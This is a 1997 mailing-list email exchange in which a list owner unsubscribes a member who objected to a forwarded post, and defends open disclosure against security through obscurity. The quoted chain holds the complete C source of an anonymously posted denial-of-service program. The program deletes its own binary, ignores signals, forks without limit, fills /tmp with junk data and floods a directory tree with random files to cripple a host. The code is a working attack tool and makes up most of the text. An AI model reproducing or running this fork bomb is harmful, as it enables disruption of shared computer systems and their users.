From: Jim Choate <ravage@ssz.com>
Date: Tue, 22 Jul 1997 10:44:21 +0800
To: jherron@basix.com
Subject: Controversial Technology
Message-ID: <199707220224.VAA12597@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi Jack,

I have removed your subscription to the Experimental Science Instrumentation
mailing list.

I would however like to point out that security through obscurity (ie
ignorance) is not security. It is self-delusion. One can not protect them
selves reliably from the many consequences of technology and society via
ignorance. That which you don't know not only can hurt you but can kill you.


    ____________________________________________________________________
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http:// www.ssz.com/  |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|



Forwarded message:

> From owner-tesla@ssz.com Mon Jul 21 21:13:16 1997
> Date: Mon, 21 Jul 1997 21:13:15 -0500
> Message-Id: <199707220213.VAA12566@einstein.ssz.com>
> To: owner-tesla@ssz.com
> From: owner-tesla@ssz.com
> Subject: BOUNCE tesla@ssz.com: Admin request
> 
> >From tesla-owner@ssz.com  Mon Jul 21 21:13:13 1997
> Received: from Base.Basix.COM (Basix.COM [198.49.101.15]) by einstein.ssz.com (8.6.12/8.6.9) with SMTP id VAA12560 for <tesla@ssz.com>; Mon, 21 Jul 1997 21:13:11 -0500
> Date: Mon, 21 Jul 1997 21:13:11 -0500
> Message-Id: <199707220213.VAA12560@einstein.ssz.com>
> Received: from sl-2.Basix.COM by Base.Basix.COM (MX V4.2 VAX) with SMTP; Mon,
>           21 Jul 1997 19:21:36 MST
> X-Sender: JHERRON@BASIX.COM
> X-Mailer: Windows Eudora Light Version 1.5.2
> MIME-Version: 1.0
> Content-Type: text/plain; charset="us-ascii"
> To: tesla@ssz.com
> From: JACK HERRON <JHERRON@BASIX.COM>
> Subject: Re: fork problem, fix? (fwd)
> 
> Jim Choate,
>         There is nothing ethical about fabricating destructive programs and
> distributing them to the irresponsible, while hiding like a coward.  Please
> unsubscribe me.
> 
> Jack Herron
> 
> 
> 
> 
> 
> 
> At 08:05 AM 7/21/97 -0500, you wrote:
> >Forwarded message:
> >>From owner-cypherpunks@ssz.com Mon Jul 21 07:39:29 1997
> >Date: Mon, 21 Jul 1997 06:55:08 +0200 (MET DST)
> >Message-Id: <199707210455.GAA29231@basement.replay.com>
> >To: cypherpunks@toad.com.redhat-list@redhat.com
> >From: nobody@replay.com (Name Withheld by Request)
> >Organization: Replay and Company UnLimited.
> >XComm: This message was automaticly Remailed by an Anonymous Remailer.
> >XComm: Report problems or inappropriate use to <postmaster@replay.com>
> >subject: fork problem, fix?
> >Sender: owner-cypherpunks@ssz.com
> >Precedence: bulk
> >X-Mailing-List: cypherpunks@ssz.com
> >X-List-Admin: list@ssz.com
> >X-Loop: ssz.com
> >
> >/* DOS-CoViN. Version .53b, coded by Vio, some ideas are from the
> >   bugtraq
> >
> >   This program is a beefed up classic denial of service fork()'er :)
> >
> >   Compilation:
> >	on BSD type of systems do:  gcc -DBSD_C  -o cvn cvn.c
> >	on SysV type of systems do: gcc -DSYSV_C -o cvn cvn.c
> >
> >	on my linux, I can compile it with both -DBSD_C and -DSYSV_C
> >
> >	if your not sure, you can experiment, or compile it
> >	without any -D'efines
> >
> >
> >   In the future:
> >	SunOS signals ignored.
> >	Creation of random symlinks for more gory destruction.
> >	Using advanced technology coding to make the hard drive
> >		blow up with a loud boom and the console explode
> >		causing a nuclear meltdown.
> >
> >
> >
> >   Direct All Suggestions And Flames to: Vio
> >
> >  NOTE: this program is provided for educational purposes only, its author
> >	will not take any responsibility for any stupid things you will
> >	decide to do.
> >
> >	this has been tested, but not the latest version of it.
> >
> >            .a&$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$&a.
> >            $$'   s   `$'   s   `$    $    $    $    `$   $$
> >            $$    $    $    $    $    $    $    $         $$
> >            $$    $    $ p  $ h  $ e  $ a  $ r  $   $a.   $$
> >            $$    $ssss$    $    $    $    $    $   $$$   $$
> >            $$    $    $    $    $.   $   ,$    $   $$$   $$
> >            $$.   $   ,$.   $   ,$$.     ,$$   .$   $$$   $$
> >            `$$&@%o%@&$$$&@%o%@&$$$$$%o%$$$$.a$$$.a$$$$$$$$'
> >
> >*/
> >
> >
> >#include <stdio.h>
> >#include <stdlib.h>
> >#include <sys/types.h>
> >#include <sys/stat.h>
> >#include <fcntl.h>
> >#include <unistd.h>
> >#include <signal.h>
> >
> >#define MAX_FILELEN 100	/* The _actual_ max length */
> >#define MAX_DIRLEN 10
> >
> >#define START_DIR "/tmp"   /* This can be substituted for any directory */
> >			   /* that you have write access to		*/
> >
> >void dirs_generator(void);
> >
> >main(int argc, char *argv[])
> >{
> >int fp;
> >char *buff;
> >char chr;
> >
> >unlink(argv[0]);
> >
> >/* You might wanna ignore all the signals you can ignore.. */
> >signal(SIGINT,	SIG_IGN);	/* If any of the signals don't work */
> >signal(SIGHUP,	SIG_IGN);	/* on the system you are compiling  */
> >signal(SIGTERM,	SIG_IGN);	/* them on, just erase that line    */
> >signal(SIGALRM,	SIG_IGN);
> >signal(SIGBUS,	SIG_IGN);
> >signal(SIGFPE,	SIG_IGN);
> >signal(SIGILL,	SIG_IGN);
> >signal(SIGIOT,	SIG_IGN);
> >signal(SIGPIPE,	SIG_IGN);
> >signal(SIGQUIT,	SIG_IGN);
> >signal(SIGSEGV,	SIG_IGN);
> >signal(SIGTRAP,	SIG_IGN);
> >signal(SIGUSR1,	SIG_IGN);
> >signal(SIGUSR2,	SIG_IGN);
> >
> >#ifdef BSD_C 
> >	signal(SIGPROF, SIG_IGN);
> >	signal(SIGSTOP, SIG_IGN);
> >	signal(SIGTSTP, SIG_IGN);
> >	signal(SIGTTIN,	SIG_IGN);
> >	signal(SIGTTOU,	SIG_IGN);
> >	signal(SIGVTALRM,	SIG_IGN);
> >	signal(SIGXCPU,	SIG_IGN);
> >	signal(SIGXFSZ,	SIG_IGN);
> >#endif
> >
> >#ifdef SYSV_C
> >	signal(SIGPOLL,	SIG_IGN);
> >	signal(SIGPWR,	SIG_IGN);
> >#endif
> >
> >if(fork()) {
> >	printf("Now crashing and blowing up this system.. have a nice day\n");
> >	printf("You can safely logout, and let the proggie do its work\n");
> >	printf("or you can stick around and watch lag go from 0 to bitch\n");
> >	printf("in a matter of seconds\n");
> >	printf("					--CoViN		 \n");
> >	exit(0);
> >  }
> >fp=open("/tmp/.foo",O_WRONLY|O_CREAT);
> >if(fork()) {
> >	while(1) {
> >		fork();
> >		buff = malloc(64000);
> >		write(fp, buff, 64000);
> >		system("uptime");
> > 	}
> > }
> >dirs_generator();
> >}
> >
> >
> >void dirs_generator(void)
> >{
> >char alph[] = "
abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ. ";
> >char fl[MAX_FILELEN]; 
> >char dir[MAX_DIRLEN];
> >int i;
> >int flen;
> >
> >printf("Making dirs..\n");
> >chdir(START_DIR);
> >
> >fork();	/* For the simplicity of the code.. we also want more dir's from */
> >fork(); /* the START_DIR						 */
> >fork();
> >
> >while(1) {
> >	fork();
> >	flen= (rand() % MAX_FILELEN) - 1;
> >	for(i=0; i<flen; i++)
> >                fl[i] = alph[rand() % strlen(alph)];
> >	fl[MAX_FILELEN-1]=0;
> >	i=open(fl,O_WRONLY|O_CREAT);
> >	write(i,"fuck you! CoViN",16);
> >	close(i);
> >
> >	flen= (rand() % MAX_DIRLEN) - 1;
> >	for(i=0; i<flen; i++)
> >		dir[i] = alph[rand() % strlen(alph)];
> >	dir[MAX_DIRLEN-1]=0;
> >	mkdir(dir,0);	
> >	chdir(dir);
> >       }
> >}
> >
> >
> -----------------------------------------
> Jack Herron - Editor
> Society for Amateur Scientists
> 8118 E. 20th St.
> Tucson, AZ 85710 USA
> jherron@basix.com
> 520 885-6933
> 





